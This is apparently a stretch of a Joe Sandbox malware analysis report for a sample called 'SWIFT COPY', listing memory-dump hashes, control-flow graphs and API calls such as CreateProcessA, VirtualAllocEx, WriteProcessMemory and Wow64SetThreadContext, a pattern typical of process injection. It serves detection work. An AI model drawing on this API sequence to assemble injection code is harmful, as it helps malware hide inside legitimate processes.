                                                                                              • Opcode Fuzzy Hash: b97f8b4cfdf1df485a097f38a01caf763f7d509e1c9d29f1f4f0b0edb0007f5c
                                                                                              • Instruction Fuzzy Hash: 9EA15277B14302CFE3098E79C4C98D97BA0FB5230175788A6E4868B650D735FA478BD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d31356871d3d8004ba1ba0e490c535e903f676d8d4c724d39a780ff47e5118a5
                                                                                              • Instruction ID: ef0d10db7af4b416638849036de2745830f8191c38b050d6fc6a3575ed0a2c41
                                                                                              • Opcode Fuzzy Hash: d31356871d3d8004ba1ba0e490c535e903f676d8d4c724d39a780ff47e5118a5
                                                                                              • Instruction Fuzzy Hash: D2A16077B14302CFE3098E79C4C98D97BA0FB1220175B88A6E4868B650D735FA478BD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 990bfbf1803b48cd35d98ccafa03cfdbe83c9225870d7e588ef73b822f09843a
                                                                                              • Instruction ID: 1cc9a5e1112ff4f38fea80adffba99508fe8399d2b0bc95eb03721be5cb47569
                                                                                              • Opcode Fuzzy Hash: 990bfbf1803b48cd35d98ccafa03cfdbe83c9225870d7e588ef73b822f09843a
                                                                                              • Instruction Fuzzy Hash: 11A15277714302CFE3098E79C4C98D97BA0FB5220175B88A6E4868B650D735FA478BD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0dcb6d858b79e4893934ba00ed25567160b9c6bf8b188a6acf4f379773042537
                                                                                              • Instruction ID: 42a100287d6f62435a9cdd816d63a3702d096abae97007f42c46ad81b0e83e83
                                                                                              • Opcode Fuzzy Hash: 0dcb6d858b79e4893934ba00ed25567160b9c6bf8b188a6acf4f379773042537
                                                                                              • Instruction Fuzzy Hash: FA916077A14302CFE3098E69C4C98D97BA4FB1320175B88A2E5868B650D735FA478BD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a291910c7e19161a478e3c55fba05eb0b293b4a42c81bf20edc004231c31b99
                                                                                              • Instruction ID: a5b6adee42fe34a425b07290eefaf868d6e395adaef92919ae5cbf19fe67093b
                                                                                              • Opcode Fuzzy Hash: 9a291910c7e19161a478e3c55fba05eb0b293b4a42c81bf20edc004231c31b99
                                                                                              • Instruction Fuzzy Hash: A2A14573B103128FD3088E1AC4C98D6BBA5FB5330075788A6E5868F655E734FA438BD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec12d29c940e98fa39f46add2e45b14bad415b0ec15905c4557bd95791d0e355
                                                                                              • Instruction ID: 4bd90e43f036afb892f4b4dbd2db256d14d21566bd4baafcb810e339804dd845
                                                                                              • Opcode Fuzzy Hash: ec12d29c940e98fa39f46add2e45b14bad415b0ec15905c4557bd95791d0e355
                                                                                              • Instruction Fuzzy Hash: 2BC16971A512189FCF14CFA5C9807DDBBB2EF88310F14C1AAE499AB655EB30D985CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b009fee7dfe00c3f7103ca70d6993d0bb388819ca06bc5e033c114231819eaa6
                                                                                              • Instruction ID: 975952533f43f2366aa5f2614ea85ebccbf3092bf339fd5aeb4e0c2913d7309e
                                                                                              • Opcode Fuzzy Hash: b009fee7dfe00c3f7103ca70d6993d0bb388819ca06bc5e033c114231819eaa6
                                                                                              • Instruction Fuzzy Hash: 3F510274E15209DFCB04CFA9D9859AEBBF2FF89310F1494A6D819A7324D730AA41CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98d69baecd104808c3a27ebc0f3d84f3b73015030cffa341b516d55b93336621
                                                                                              • Instruction ID: 45153a225b5fbf063d188c2f3f8168aa72ae8e57188bad236c59efd054e7388a
                                                                                              • Opcode Fuzzy Hash: 98d69baecd104808c3a27ebc0f3d84f3b73015030cffa341b516d55b93336621
                                                                                              • Instruction Fuzzy Hash: 5B21F671E016188BDB18CFABD9446DEBBF7EFC8310F14C06AD409A6268DB355946CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6bced59702556580ad9ede3110786f856480c06973d60519fbb5dabbb08940a0
                                                                                              • Instruction ID: 10c4cdb378bd5eaa7633a1bed286833eac3f86c1f45d65df8d3327b5387807f8
                                                                                              • Opcode Fuzzy Hash: 6bced59702556580ad9ede3110786f856480c06973d60519fbb5dabbb08940a0
                                                                                              • Instruction Fuzzy Hash: 9D21E9B1E016588BDB18CFA7D9447DEBBF3AFC8310F14C16AD409AA268DB351946CF50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2063 9b73ced-9b73d8d 2065 9b73dc6-9b73de6 2063->2065 2066 9b73d8f-9b73d99 2063->2066 2073 9b73e1f-9b73e4e 2065->2073 2074 9b73de8-9b73df2 2065->2074 2066->2065 2067 9b73d9b-9b73d9d 2066->2067 2068 9b73dc0-9b73dc3 2067->2068 2069 9b73d9f-9b73da9 2067->2069 2068->2065 2071 9b73dad-9b73dbc 2069->2071 2072 9b73dab 2069->2072 2071->2071 2075 9b73dbe 2071->2075 2072->2071 2082 9b73e87-9b73f41 CreateProcessA 2073->2082 2083 9b73e50-9b73e5a 2073->2083 2074->2073 2076 9b73df4-9b73df6 2074->2076 2075->2068 2078 9b73e19-9b73e1c 2076->2078 2079 9b73df8-9b73e02 2076->2079 2078->2073 2080 9b73e06-9b73e15 2079->2080 2081 9b73e04 2079->2081 2080->2080 2084 9b73e17 2080->2084 2081->2080 2094 9b73f43-9b73f49 2082->2094 2095 9b73f4a-9b73fd0 2082->2095 2083->2082 2085 9b73e5c-9b73e5e 2083->2085 2084->2078 2087 9b73e81-9b73e84 2085->2087 2088 9b73e60-9b73e6a 2085->2088 2087->2082 2089 9b73e6e-9b73e7d 2088->2089 2090 9b73e6c 2088->2090 2089->2089 2092 9b73e7f 2089->2092 2090->2089 2092->2087 2094->2095 2105 9b73fd2-9b73fd6 2095->2105 2106 9b73fe0-9b73fe4 2095->2106 2105->2106 2107 9b73fd8 2105->2107 2108 9b73fe6-9b73fea 2106->2108 2109 9b73ff4-9b73ff8 2106->2109 2107->2106 2108->2109 2112 9b73fec 2108->2112 2110 9b73ffa-9b73ffe 2109->2110 2111 9b74008-9b7400c 2109->2111 2110->2111 2113 9b74000 2110->2113 2114 9b7401e-9b74025 2111->2114 2115 9b7400e-9b74014 2111->2115 2112->2109 2113->2111 2116 9b74027-9b74036 2114->2116 2117 9b7403c 2114->2117 2115->2114 2116->2117 2119 9b7403d 2117->2119 2119->2119
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09B73F2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 98d4340c3f84e93089bf0d47474f268f12164f941a9f3bd565a94b2ef9284dda
                                                                                              • Instruction ID: d667d809866a6b7eefa46094c950651748d09d56a934971024faa9bc2abfd842
                                                                                              • Opcode Fuzzy Hash: 98d4340c3f84e93089bf0d47474f268f12164f941a9f3bd565a94b2ef9284dda
                                                                                              • Instruction Fuzzy Hash: B9A16971D003198FEB10DF68C841BEDBAF2FF48324F1486A9E819A7290DB759985DF91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2120 9b73cf8-9b73d8d 2122 9b73dc6-9b73de6 2120->2122 2123 9b73d8f-9b73d99 2120->2123 2130 9b73e1f-9b73e4e 2122->2130 2131 9b73de8-9b73df2 2122->2131 2123->2122 2124 9b73d9b-9b73d9d 2123->2124 2125 9b73dc0-9b73dc3 2124->2125 2126 9b73d9f-9b73da9 2124->2126 2125->2122 2128 9b73dad-9b73dbc 2126->2128 2129 9b73dab 2126->2129 2128->2128 2132 9b73dbe 2128->2132 2129->2128 2139 9b73e87-9b73f41 CreateProcessA 2130->2139 2140 9b73e50-9b73e5a 2130->2140 2131->2130 2133 9b73df4-9b73df6 2131->2133 2132->2125 2135 9b73e19-9b73e1c 2133->2135 2136 9b73df8-9b73e02 2133->2136 2135->2130 2137 9b73e06-9b73e15 2136->2137 2138 9b73e04 2136->2138 2137->2137 2141 9b73e17 2137->2141 2138->2137 2151 9b73f43-9b73f49 2139->2151 2152 9b73f4a-9b73fd0 2139->2152 2140->2139 2142 9b73e5c-9b73e5e 2140->2142 2141->2135 2144 9b73e81-9b73e84 2142->2144 2145 9b73e60-9b73e6a 2142->2145 2144->2139 2146 9b73e6e-9b73e7d 2145->2146 2147 9b73e6c 2145->2147 2146->2146 2149 9b73e7f 2146->2149 2147->2146 2149->2144 2151->2152 2162 9b73fd2-9b73fd6 2152->2162 2163 9b73fe0-9b73fe4 2152->2163 2162->2163 2164 9b73fd8 2162->2164 2165 9b73fe6-9b73fea 2163->2165 2166 9b73ff4-9b73ff8 2163->2166 2164->2163 2165->2166 2169 9b73fec 2165->2169 2167 9b73ffa-9b73ffe 2166->2167 2168 9b74008-9b7400c 2166->2168 2167->2168 2170 9b74000 2167->2170 2171 9b7401e-9b74025 2168->2171 2172 9b7400e-9b74014 2168->2172 2169->2166 2170->2168 2173 9b74027-9b74036 2171->2173 2174 9b7403c 2171->2174 2172->2171 2173->2174 2176 9b7403d 2174->2176 2176->2176
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09B73F2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: f7e645257f61051960701687e13e362ebfdc80fef9aabb6bbfea01fe517bb217
                                                                                              • Instruction ID: 69ec682451ffa122b39488304758cfb72a5345654e1f90c62d6cebf8989687e5
                                                                                              • Opcode Fuzzy Hash: f7e645257f61051960701687e13e362ebfdc80fef9aabb6bbfea01fe517bb217
                                                                                              • Instruction Fuzzy Hash: 58915871D003198FEB10DF68D841BEDBAF2FB48324F1486A9E819A7280DB759985DF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 9d811a473cdc04ae44c6978ae5065d6acdb9a1d10fa4ceec63d49f98b3b351d0
                                                                                              • Instruction ID: 7660a034acb9ba7fa0ec69f841f4f8bca64d089a2a895147782c65be9aea0a08
                                                                                              • Opcode Fuzzy Hash: 9d811a473cdc04ae44c6978ae5065d6acdb9a1d10fa4ceec63d49f98b3b351d0
                                                                                              • Instruction Fuzzy Hash: 75814370A00B458FDB24DF6AD44079ABBF1FF89304F048929D48ADBA50E775F84ACB91
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 04FB8E51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 0265bb22812a51822b543dbe9d4d22c5c94a6c5f94607ba96389d91fa291d207
                                                                                              • Instruction ID: ee32a072ff158fb4e135974c64fa45a18a6296500a598abca75c903733224203
                                                                                              • Opcode Fuzzy Hash: 0265bb22812a51822b543dbe9d4d22c5c94a6c5f94607ba96389d91fa291d207
                                                                                              • Instruction Fuzzy Hash: 1A5102B1C00619CFDB24DFAAC844BDEBBF5BF89314F20806AD448AB251D7796946CF91
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 04FB8E51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: d40ab2c771fa733dac4ffebfe2cdce8bc93be6f81a7d2aeaf3de4ff99050cc15
                                                                                              • Instruction ID: 2e730bd25fd60cfce21f939368b489786d17705c1961b7650033de683239f261
                                                                                              • Opcode Fuzzy Hash: d40ab2c771fa733dac4ffebfe2cdce8bc93be6f81a7d2aeaf3de4ff99050cc15
                                                                                              • Instruction Fuzzy Hash: D741B0B0D00619CBDB24DFAAC844BDEBBF5BF89304F20846AD408AB251DB756946CF90
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09B736C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 63766237cab9d55992e646536ba5ec7a95276c084670d09f2d04443f7b1c0464
                                                                                              • Instruction ID: 0206f8212b5f1eba3a638a5a2ebe7f5b6d0414dbd8b309da228fffc01e635860
                                                                                              • Opcode Fuzzy Hash: 63766237cab9d55992e646536ba5ec7a95276c084670d09f2d04443f7b1c0464
                                                                                              • Instruction Fuzzy Hash: 852135719003499FDB14CFA9C881BEEBBF5FF88320F10882AE919A7250D7799940DB60
                                                                                              APIs
                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D4BD3D,?,?), ref: 09D4BDEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: DrawText
                                                                                              • String ID:
                                                                                              • API String ID: 2175133113-0
                                                                                              • Opcode ID: dfe756063a9ff792cdce915dd06352a262ed28ed5f6a2025dfa98a8df30abaf0
                                                                                              • Instruction ID: 5cc5899a53fb12c978d3011df64e64f42cd7ff6156ff8a1f4239d2890ced9d71
                                                                                              • Opcode Fuzzy Hash: dfe756063a9ff792cdce915dd06352a262ed28ed5f6a2025dfa98a8df30abaf0
                                                                                              • Instruction Fuzzy Hash: 9B31E0B5D002499FDB10CF9AD884AAEFBF5FF58320F14842AE919A7710D375A944CFA0
                                                                                              APIs
                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D4BD3D,?,?), ref: 09D4BDEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: DrawText
                                                                                              • String ID:
                                                                                              • API String ID: 2175133113-0
                                                                                              • Opcode ID: d69ef592130ed87e7f3f86a22b5509f616f1ea27d2f9cb18f524908710dd55a2
                                                                                              • Instruction ID: a148e4b84ce0f6a69b738be6747c1b2190ed0e401ee6545d48b3b67b39985bd0
                                                                                              • Opcode Fuzzy Hash: d69ef592130ed87e7f3f86a22b5509f616f1ea27d2f9cb18f524908710dd55a2
                                                                                              • Instruction Fuzzy Hash: CC31EEB5D002499FDB10CF9AD884AEEFBF5FF58320F14842AE819A7610D775A944CFA0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09B736C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 80c831ba3d50361336003fccecb92952508c95361948629578830070ed094653
                                                                                              • Instruction ID: f42e9d9d5559b2fa75eb4b6f55bfa04f9d28aa34642652e0159c4a3d63e74917
                                                                                              • Opcode Fuzzy Hash: 80c831ba3d50361336003fccecb92952508c95361948629578830070ed094653
                                                                                              • Instruction Fuzzy Hash: E12127719003499FDB14DFAAC885BEEBBF5FF48320F148829E918A7240D7799940DBA4
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09B730E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 5069afe892e4994e55f8f06e4ff71ca102d22e1e759b72b460c87e604db04866
                                                                                              • Instruction ID: 4fd70630811b02b67b90674d9da798401163d3df5c42079f04c71994d1d5a177
                                                                                              • Opcode Fuzzy Hash: 5069afe892e4994e55f8f06e4ff71ca102d22e1e759b72b460c87e604db04866
                                                                                              • Instruction Fuzzy Hash: 6C2123719002098FDB14DFAAC485BEEBBF4EF98324F14842AE459A7240CB799945CFA0
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09B730E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: b4c5128aaa5a475b867397be1bec98fc61df3d89df6883c577b8ab276e3ac3c4
                                                                                              • Instruction ID: e01519ec6c27f4aae7c4ef64267b3e28ac3fe74719086756bb6fc359ac6b845f
                                                                                              • Opcode Fuzzy Hash: b4c5128aaa5a475b867397be1bec98fc61df3d89df6883c577b8ab276e3ac3c4
                                                                                              • Instruction Fuzzy Hash: 6E2134719003098FDB10DFAAC485BAEBBF4EF98324F14842AE419A7240DB799944CFA0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B737A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: a43e8447ade45d6c83f51b3cbaab4b15cd9f4c7f5edff66e70787a765479f830
                                                                                              • Instruction ID: 8e463a9e22097f07f66586d7fbfdae92165c16503c41e981d38d1b92b0465c94
                                                                                              • Opcode Fuzzy Hash: a43e8447ade45d6c83f51b3cbaab4b15cd9f4c7f5edff66e70787a765479f830
                                                                                              • Instruction Fuzzy Hash: AA2139B1C003499FDB10DFAAC880AEEFBF5FF48320F108429E518A7240D7799940DBA0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09B737A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 3864e16109611af9060b97dcf979c8babe1033fecdcbad0cb1bd986414a58ee6
                                                                                              • Instruction ID: 8ee257df3126402b61ac81bb017f86cdcdfb282edc7735da48413652da0eb304
                                                                                              • Opcode Fuzzy Hash: 3864e16109611af9060b97dcf979c8babe1033fecdcbad0cb1bd986414a58ee6
                                                                                              • Instruction Fuzzy Hash: 432125B5800349DFDB10DFAAC985AEEFBF5FF48320F14842AE518A7250D7399944DBA0
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 099A7C03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: fa6cb98c7f767313bd7822960a1524f20751b9afb1935e7a9339c27c5f718736
                                                                                              • Instruction ID: c30b318d4d268e11ccc3631ded5834c48fb3fd79991710dbd4ef1af1e5ed587c
                                                                                              • Opcode Fuzzy Hash: fa6cb98c7f767313bd7822960a1524f20751b9afb1935e7a9339c27c5f718736
                                                                                              • Instruction Fuzzy Hash: 69212475D00249DFCB10DF9AD844ADEFBF8EB48320F14842AE458A7241D779A544CFA1
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09B735E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 26dd65511ab5b5b6b0f09be52800d949d78c6e7b50e51fe6e546a41aaddbb9d6
                                                                                              • Instruction ID: 9324d95bbc6747a96e6243777ce5094dbd46afbd6af1871f52b575f19e04a3e4
                                                                                              • Opcode Fuzzy Hash: 26dd65511ab5b5b6b0f09be52800d949d78c6e7b50e51fe6e546a41aaddbb9d6
                                                                                              • Instruction Fuzzy Hash: 551159718002499FDB10DFA9D845AEEBFF5EF98320F148819E515A7250CB769940CFA0
                                                                                              APIs
                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09D4CA6A,?,?,?,?,?), ref: 09D4CF17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              • Opcode ID: 68f1cbcaeba9402e0ffe9bd6976befcedd5a261bef1c2980e76e13c95be7cac5
                                                                                              • Instruction ID: 0cf8be295b8e959ee90ed246a39cfd1083b764b4d09ea8df079fc352d1ad71d1
                                                                                              • Opcode Fuzzy Hash: 68f1cbcaeba9402e0ffe9bd6976befcedd5a261bef1c2980e76e13c95be7cac5
                                                                                              • Instruction Fuzzy Hash: 551179B1800249DFDB10CFAAC844BEEBFF8EF58320F14841AE554A7610C379A950CFA0
                                                                                              APIs
                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09D4CA6A,?,?,?,?,?), ref: 09D4CF17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              • Opcode ID: ed2b18c7bc140bf7bb8581abfcb7e9b634442f54ecf8a853815cdbdfbb2b646c
                                                                                              • Instruction ID: 390f1742b72ac0206fc47c77c922e7895e4eed2f2e87d81f149ae4fc5b6f70e2
                                                                                              • Opcode Fuzzy Hash: ed2b18c7bc140bf7bb8581abfcb7e9b634442f54ecf8a853815cdbdfbb2b646c
                                                                                              • Instruction Fuzzy Hash: 031146B5800249DFDB10CFAAC844BEEBFF8EF58320F14841AE954A7250C379A950DFA5
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 099A7C03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 1456775730ebdd70d2a013a01e44731c2e51e363419d01ce6b2481494e9b0a7c
                                                                                              • Instruction ID: 40e2a6532a095ba15afb403acfa5c0567ba3f4b4db46f2e21a4b60a27ec914f8
                                                                                              • Opcode Fuzzy Hash: 1456775730ebdd70d2a013a01e44731c2e51e363419d01ce6b2481494e9b0a7c
